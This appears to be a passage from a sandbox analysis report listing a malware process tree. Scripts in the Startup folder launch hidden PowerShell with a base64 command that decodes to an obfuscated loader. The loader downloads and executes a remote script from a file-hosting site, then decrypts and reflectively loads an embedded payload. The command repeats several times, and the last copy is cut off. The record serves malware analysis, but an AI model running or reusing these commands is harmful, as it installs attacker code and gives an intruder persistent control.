      • powershell.exe (PID: 7096 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3208 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6224 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7100 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 1144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2860 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2540 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6644 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1564 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKH